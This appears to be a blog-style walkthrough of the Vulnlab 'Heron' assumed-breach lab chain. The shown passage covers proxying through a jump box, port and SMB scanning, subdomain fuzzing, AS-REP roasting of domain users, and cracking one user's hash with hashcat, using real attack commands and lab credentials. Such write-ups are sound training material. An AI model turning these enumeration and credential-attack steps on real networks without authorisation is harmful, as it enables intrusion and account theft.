Ahhh, the `Assumed Breach` Scenarioβ€”always an interesting exercise. Not only are these assessments enjoyable as a tester, but they also provide significant insight for the client. The assumed breach approach shifts focus away from perimeter defences and instead acknowledges a fundamental reality: at some point, an attacker will gain access. Whether this is through a zero-day such as Exchange or FortiGate exploits or a phishing attack leading to cloud or local host access, initial compromise is inevitable at some point. In most cases, the attacker will start with some sort of valid credentials, operating within a compromised network device, server, or appliance. Rather than focusing on how they got in, the emphasis is placed on what happens next. From experience, this is where many environments fall short. That being said, lets jump into Heron. A 2 machine chain from Vulnlab in an assumed breach sceanrio. #### Credentials πŸ•΅πŸ½β€β™‚οΈ --- Checing out the wiki, it shows we have been given valid credentials for a JumpBox. ![[Pasted image 20250308122334.png]] ``` pentest:Heron123! ``` ![[Pasted image 20250308122402.png]] Excellent stuff πŸ‘©πŸ½β€πŸš€ #### Jump Box 🦘 --- First off lets see what ports are open on the jump box located on `10.10.206.150` ``` rustscan -a 10.10.206.150 -- -sC -sV -Pn -n .----. .-. .-. .----..---. .----. .---. .--. .-. .-. | {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| | | .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ | `-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-' The Modern Day Port Scanner. ________________________________________ : http://discord.skerritt.blog : : https://github.com/RustScan/RustScan : -------------------------------------- You miss 100% of the ports you don't scan. - RustScan [~] The config file is expected to be at "/home/rustscan/.rustscan.toml" [~] File limit higher than batch size. Can increase speed by increasing batch size '-b 1073741716'. Open 10.10.206.150:22 [~] Starting Script(s) [>] Running script "nmap -vvv -p {{port}} {{ip}} -sC -sV -Pn -n" on ip ---SNIP--- Nmap scan report for 10.10.206.150 Host is up, received user-set (0.032s latency). Scanned at 2025-03-08 12:48:35 UTC for 1s PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.7 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 10:a0:bd:2a:81:3d:37:5d:23:75:c8:d2:83:bf:2a:23 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIVPUPzGA2ERjiZJk6cW/S1+nDZvJbjSLwjGgTU8RETSfBV9pgYbUDrmu28cmDSCKQ0cirkaf3dggjVtJO/EvYM= | 256 bd:32:29:26:4d:41:d7:56:01:37:bc:10:0c:de:45:24 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFkNc5lDxvCLp4GsbGLiAmmFudhK+TXxP978Cp6Y+z4b Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ---SNIP--- Nmap done: 1 IP address (1 host up) scanned in 1.47 seconds ``` Looks like we have an Ubuntu Box with just SSH open on port 22 so were SSH'ing in ⚑ 🏑 Once we are connected successfully, analyses of the `/home` directories exposes 2 Domain Accounts `[email protected]` and `[email protected]` and also a `_local` account. We also have the name of the Domain `heron.vl` and the name of the jump server `[email protected]` ``` ssh [email protected] The authenticity of host '10.10.206.150 (10.10.206.150)' can't be established. ED25519 key fingerprint is SHA256:7vUA9tMchnLRfzMzAtJD+Hwwr0nppIBRhctvevOQbm0. ---SNIP--- Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.10.206.150' (ED25519) to the list of known hosts. **************************************************** * Welcome to Heron Corp * * Unauthorized access to 'frajmp.heron.vl' is * * forbidden and will be prosecuted by law. * **************************************************** ([email protected]) Password: Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-107-generic x86_64) ---SNIP--- Last login: Fri Jun 7 10:34:38 2024 from 10.8.0.101 pentest@frajmp:~$ ls pentest@frajmp:~$ cd .. pentest@frajmp:/home$ ls _local pentest [email protected] [email protected] pentest@frajmp:/home$ ``` #### What we know so far --- * `[email protected]` and `[email protected]` Domain Accounts * `_local` Ubuntu account * Domain Name `heron.vl` * Jump server is called `frajmp.heron.vl` #### Domain Enumeration --- The jumpbox is a standard Ubuntu Server and so doesnt have any specific tools installed. We could transfer them over or if we have any rights try and install tools. ![[Pasted image 20250308130601.png]] Checking the Network Stack highlights we are on a `\28` subnet, which is typically small and allows for 16 IPs or 14 Hosts and then the Network and Broadcast Addresses. Network Address: 10.10.206.144 Usable Hosts: 10.10.206.145 – 10.10.206.158 Broadcast Address: 10.10.206.159 ``` pentest@frajmp:~$ ip add 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default ---SNIP--- 2: ens5: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc mq state UP group default qlen 1000 link/ether 0a:a5:62:62:40:6d brd ff:ff:ff:ff:ff:ff altname enp0s5 inet 10.10.206.150/28 metric 100 brd 10.10.206.159 scope global dynamic ens5 valid_lft 3590sec preferred_lft 3590sec inet6 fe80::8a5:62ff:fe62:406d/64 scope link valid_lft forever preferred_lft forever ``` #### SSH Proxy --- In a real enagagemnt it maybe acceptable to install additional tooling if the client has spun up a specific instance which is going to be burned after the test but in this case it makes more sense to SSH proxy everything from our local Kali instance. ``` ssh -D 9050 -N -f [email protected] **************************************************** * Welcome to Heron Corp * * Unauthorized access to 'frajmp.heron.vl' is * * forbidden and will be prosecuted by law. * **************************************************** ([email protected]) Password: ``` Running `ss -tulpn|grep 9050` shows the port has been opened on our local machine. ``` ss -tulpn |grep 9050 tcp LISTEN 0 128 127.0.0.1:9050 0.0.0.0:* users:(("ssh",pid=2129,fd=5)) tcp LISTEN 0 128 [::1]:9050 [::]:* users:(("ssh",pid=2129,fd=4)) ``` #### NXC - NetExec --- Proxying through `nxc` with the `smb` module can quickly and easily confirm which host are available and exposing the service on port `445`. In a typical Windows environment this should give us some quick intel. In this case we get the other machine in the chain, the DC located at `10.10.206.149` ``` proxychains -q nxc smb 10.10.206.144/28 SMB 10.10.206.149 445 MUCDC [*] Windows Server 2022 Standard 20348 x64 (name:MUCDC) (domain:heron.vl) (signing:True) (SMBv1:True) Running nxc against 16 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00 ``` Now we have some additional info, lets update what we know. #### What we know so far - Update πŸ‘πŸ½ --- * `[email protected]` and `[email protected]` Domain Accounts * `_local` Ubuntu account * Domain Name `heron.vl` * Jump server is called `frajmp.heron.vl` * DC IP Address `10.10.206.149` * DC Hostname `MUCDC` #### Rustscan Portable 🚲 --- I normally run `nmap` through the SSH tunnel, especially if its just a single host. But for some reason it doesnt like to go across the Vulnlab VPN so i'm transferring `Rustcan` over. ``` pentest@frajmp:~$ wget http://10.8.1.197:8008/rustscan --2025-03-08 17:44:10-- http://10.8.1.197:8008/rustscan Connecting to 10.8.1.197:8008... connected. HTTP request sent, awaiting response... 200 OK Length: 4644976 (4.4M) [application/octet-stream] Saving to: β€˜rustscan’ rustscan 100%[===================================>] 4.43M 7.52MB/s in 0.6s 2025-03-08 17:44:11 (7.52 MB/s) - β€˜rustscan’ saved [4644976/4644976] ``` Lets make `rustscan` executable and scan the DC. It fails as `namp` isnt installed but we can work with this. ``` pentest@frajmp:~$ ./rustscan -a 10.10.222.5 -- -sC -sV -Pn -n .----. .-. .-. .----..---. .----. .---. .--. .-. .-. | {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| | | .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ | `-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-' The Modern Day Port Scanner. ________________________________________ : http://discord.skerritt.blog : : https://github.com/RustScan/RustScan : -------------------------------------- To scan or not to scan? That is the question. ---SNP--- Open 10.10.222.5:53 Open 10.10.222.5:80 Open 10.10.222.5:88 Open 10.10.222.5:135 Open 10.10.222.5:139 Open 10.10.222.5:389 Open 10.10.222.5:445 Open 10.10.222.5:464 Open 10.10.222.5:593 Open 10.10.222.5:636 Open 10.10.222.5:3268 Open 10.10.222.5:3269 Open 10.10.222.5:3389 Open 10.10.222.5:9389 Open 10.10.222.5:49664 Open 10.10.222.5:49667 Open 10.10.222.5:49669 Open 10.10.222.5:49670 Open 10.10.222.5:52438 Open 10.10.222.5:52451 Open 10.10.222.5:52465 Open 10.10.222.5:52482 Open 10.10.222.5:52520 [~] Starting Script(s) [>] Running script "nmap -vvv -p {{port}} {{ip}} -sC -sV -Pn -n" on ip 10.10.222.5 Depending on the complexity of the script, results may take some time to appear. sh: 1: nmap: not found [!] Error Exit code = 127 ``` #### Port 80 πŸ•Έ --- `cURL` gives us some user emails `[email protected]` `[email protected]` `[email protected]` ``` <i class="fas fa-user-tie fa-3x mb-3"></i> <h5 class="card-title">Wayne Wood</h5> <p class="card-text">CEO</p> <p>Email: [email protected]</p> </div> </div> </div> <div class="col-md-4"> <div class="card mb-4 shadow-sm contact-card"> <div class="card-body"> <i class="fas fa-user-tie fa-3x mb-3"></i> <h5 class="card-title">Julian Pratt</h5> <p class="card-text">Head of IT</p> <p>Email: [email protected]</p> </div> </div> </div> <div class="col-md-4"> <div class="card mb-4 shadow-sm contact-card"> <div class="card-body"> <i class="fas fa-user-tie fa-3x mb-3"></i> <h5 class="card-title">Samuel Davies</h5> <p class="card-text">Accounting</p> <p>Email: [email protected]</p> ``` #### Sub Domains --- Enumerate sub domains, because enumeration is always good. We see accounting.heron.vl ``` proxychains -q wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u "http://heron.vl" -H "Host: FUZZ.heron.vl" --hl 86 Check Wfuzz's documentation for more information. ******************************************************** * Wfuzz 3.1.0 - The Web Fuzzer * ******************************************************** Target: http://heron.vl/ Total requests: 19966 ===================================================================== ID Response Lines Word Chars Payload ===================================================================== 000001972: 401 0 L 0 W 0 Ch "accounting" ``` Which is protected by basic auth and gives us a `401 Unauthorised` HTTP code ``` curl http://accounting.heron.vl -v * Trying 10.10.222.5:80... * Connected to accounting.heron.vl (10.10.222.5) port 80 (#0) > GET / HTTP/1.1 > Host: accounting.heron.vl > User-Agent: curl/7.81.0 > Accept: */* > * Mark bundle as not supporting multiuse < HTTP/1.1 401 Unauthorized < Transfer-Encoding: chunked < Server: Microsoft-IIS/10.0 < WWW-Authenticate: Negotiate < WWW-Authenticate: NTLM < X-Powered-By: ASP.NET < Date: Sat, 08 Mar 2025 18:11:57 GMT ``` #### Where we at? πŸ’­ --- Basically, we got no creds! But we have some usernames! #### ASREPROAST πŸ”₯ --- As we have no creds, just usernames we can try an ASREPROAST. If the users has the `UF_DONT_REQUIRE_PREAUTH` flag set, we can get a TGT as typically when a client sends a request for a TGT to the KDC (Key Distribution Centre), a reuest is made which includes the User Principal Name (UPN), a timestamp, and Pre-Authentication data which is sent encrypted with the user’s password hash. If a user is assigned the `UF_DONT_REQUIRE_PREAUTH` then this pre authetication data is not required and a TGT is obtained withoit knowing the password. Seems silly but with most of these things its typically there to support legacy systems or applications or custom kerberos setups. ``` proxychains -q nxc ldap mucdc -u users -p '' --asreproast ASREPROAST ``` ![[Pasted image 20250308184325.png]] #### Hashcat 🐈 --- ``` hashcat -m 18200 -a 0 samuel.davies.hash /usr/share/wordlists/rockyou.txt ``` ![[Pasted image 20250308184737.png]] ``` PASSWORD: [email protected]:l6fkiy9oN ```